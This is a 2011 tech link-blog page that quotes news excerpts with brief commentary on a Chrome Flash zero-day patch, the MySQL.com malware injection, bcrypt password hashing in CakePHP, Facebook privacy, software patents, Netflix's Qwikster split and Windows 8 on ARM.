26 Sep

PCMag – Google Patches Flash Zero Day Bug, Jumps the Gun on Adobe Again

Google has developed a bad habit with respect to patching vulnerabilities in the integrated version of Adobe Flash in their Chrome for Windows browser: They release and announce the updates before Adobe does. They have done it several times in the last year or so and today they did it again. "The Beta and Stable channels have been updated to 14.0.835.186 for Windows, Mac, Linux, and Chrome Frame."

This creates a situation in which Adobe has a zero day bug with increased severity. It’s likely that they aren’t ready to release their own patches, yet 3rd parties could look at the Chrome update and potentially examine it in order to determine what it is patching. From that they could construct an exploit.

via PCMag – Google Patches Flash Zero Day Bug, Jumps the Gun on Adobe Again. The bad habit isn’t Google patching security holes it’s Adobe not patching them first.

26 Sep

Ars Technica – Hackers turn MySQL.com into malware launchpad

Web security firm Armorize reported in its blog today that the MySQL.com website has been turned into a launchpad for serving up malware attacks. Visitors to the home page of the site are hit with a JavaScript injection attack that has been planted on the site. The script opens an IFRAME to a malicious site, which in turn launches a BlackHole exploit "pack" that probes for known browser and plugin weaknesses and then stealthily installs malware on the visitor’s PC. There’s no warning button or action required by the user other than visiting the site to trigger the download.

via Ars Technica – Hackers turn MySQL.com into malware launchpad. What the heck is Oracle doing with MySQL? Also, how long would you keep trusting Oracle software with this kind of security failing.

26 Sep

Mark Story – Using bcrypt for passwords in CakePHP

CakePHP uses salted sha1 hashes for passwords by default, and has for a while. There has been some talk on the mailing list lately of switching the default hashing to something more secure, such as bcrypt. I think this is a great idea, and will find its way into CakePHP in a future release. Providing a reasonanle upgrade experience is the biggest problem to solve, if the default hashing strategy was to change. One option is to silently upgrading passwords. I’m not a fan of this approach as it has more room to go wrong, and possibly corrupt data. Another option, allowing developers to stick with sha1 if they have passwords hashed with it is a safer and probably better overall option.

While bcrypt is not part of CakePHP just yet, I wanted to see how difficult it would be to start using bcrypt today. Turns out it was pretty simple. Getting bcrypt working only required a subclass of FormAuthenticate and a two line change to the User class.

via Mark Story – Using bcrypt for passwords in CakePHP. Awesome, I tried doing this in CakePHP 1.3 a few weeks ago but couldn’t get it to work right all the time.

24 Sep

Scripting News – Facebook is scaring me

What clued me in was an article on ReadWriteWeb that says that just reading an article on their site may create an announcement on Facebook. Something like: "Bull Mancuso just read a tutorial explaining how to kill a member of another crime family." Bull didn’t comment. He didn’t press a Like button. He just visited a web page. And an announcement was made on his behalf to everyone who follows him on Facebook. Not just his friends, because now they have subscribers, who can be total strangers.

Now, I’m not technically naive. I understood before that the Like buttons were extensions of Facebook. They were surely keeping track of all the places I went. And if I went to places that were illegal, they would be reported to government agencies. Bull Mancuso in the example above has more serious things to worry about than his mother finding out that he’s a hitman for the mob. (Both are fictitious characters, and in my little story his mom already knows he’s a hitman.)

There could easily be lawsuits, divorces, maybe even arrests based on what’s made public by Facebook.

via Scripting News – Facebook is scaring me. Count me in the group of people now staying logged out of Facebook by default.

24 Sep

Numair Faraz – I was once a Facebook fool

If you are entrusting your life data to Facebook, or if you are depending on Facebook and its platform for your livelihood, beware. In the real Facebook world, there is no trust, and there is no friendship — there is only money and power. Think really hard — really, think — before trusting Facebook or its employees with anything. Don’t be a Facebook fool.

via Numair Faraz – I was once a Facebook fool. Trusting your business to another business is generally not a good idea, but trusting Facebook is never a good idea.

24 Sep

The White House – Direct the Patent Office to Cease Issuing Software Patents

The patent office’s original interpretation of software as language and therefor patentable is much closer to reality and more productive for innovation than it’s current practice of issuing software patents with no understanding of the patents being issued.

Under the patent office’s current activity, patents have been come a way to stifle innovation and prevent competition rather than supporting innovation and competitive markets. They’ve become a tool of antitrust employed by large companies against small ones.

To return sanity to the software industry – one of the few industries still going strong in America – direct the patent office to cease issuing software patents and to void all previously issued software patents.

via The White House – Direct the Patent Office to Cease Issuing Software Patents. Why haven’t you signed this petition?

20 Sep

Online Video News – Netflix’s DVD business: Does Qwikster have a future?

Netflix announced in a blog post Sunday evening that its DVD-by-mail operations would soon be rebranded “Qwikster,” and that the service would be separated from the streaming service that the company has been pushing for the last several years. Doing so clearly grants some independence to the unit, and will help it to operate without dealing with fast-growing streaming business. But it also raises questions about the future viability of a standalone DVD-by-mail operation.

Netflix isn’t completely abandoning the new DVD business — at least, not yet. After all, Qwikster will have the same characteristic red envelope and the same legacy infrastructure and library supporting it. However, it seems clear that Netflix is creating a wall between the two businesses as a way to smartly manage its profits and losses, and to help Wall Street better value the separate operations.

via Online Video News – Netflix’s DVD business: Does Qwikster have a future?. Most people have complained primarly about the price increase Netflix brought about with splitting up it’s DVD and Streaming plans. That’s a side issue, licensing fees for streaming have most likely increased as the popularity and catalog of streamed movies increased.

The thing that bothers me about this decision is it makes a worse experience for those customers who straddle the line (using both the DVD and Streaming plans). All of sudden we have multiple queues, websites, rating systems, etc. One side aspect of this is who gets the core of the team that works on predicting what movie you’ll like after ranking this other movie (Netflix’s real golden goose). Will my rankings on one site generate better results? It also begins to sound like Netflix is planning to sell off it’s DVD side of the business. Never outside the realm of possible options but now it feels like it could happen in the next 6 months and Netflix couldn’t be bothered otherwise.

How long until Qwikster becomes just another forgotten piece of internet real estate?

20 Sep

Daring Fireball – The Case for Going Metro-Only on ARM

Read the whole thing. His take is reasonable. If Windows 8 does ship with support for classic non-Metro apps on ARM machines, these will be the reasons why.

But there are other good reasons, I think, for why Microsoft should cut the cord cleanly and go Metro-only on ARM.

via Daring Fireball – The Case for Going Metro-Only on ARM. When I posted the link about Windows 8 being able to run normal desktop apps, I somewhat flippantly said that it “could keep Win­dows 8 from being truly awesome”, this is why.

20 Sep

ZDNet – Microsoft: Desktop apps will run on Windows 8 on ARM

I’ve heard numerous folks who attended Build in person and/or via Webcasts say that there will be no Desktop app experience when Windows 8 ships on PCs and tablets running on ARM processors. Until today, I thought the same. But this is not correct.

Microsoft officials have been saying for months that existing x86 applications won’t just run on Windows on ARM; they will need to be recompiled. Microsoft is hoping and expecting that the majority of devs will go to the trouble of “Metro-izing” their apps while they are recompiling them to run on Windows 8 on ARM. However, that is guidance, and not a requirement.

via ZDNet – Microsoft: Desktop apps will run on Windows 8 on ARM. That’s the decision that could keep Windows 8 from being truly awesome.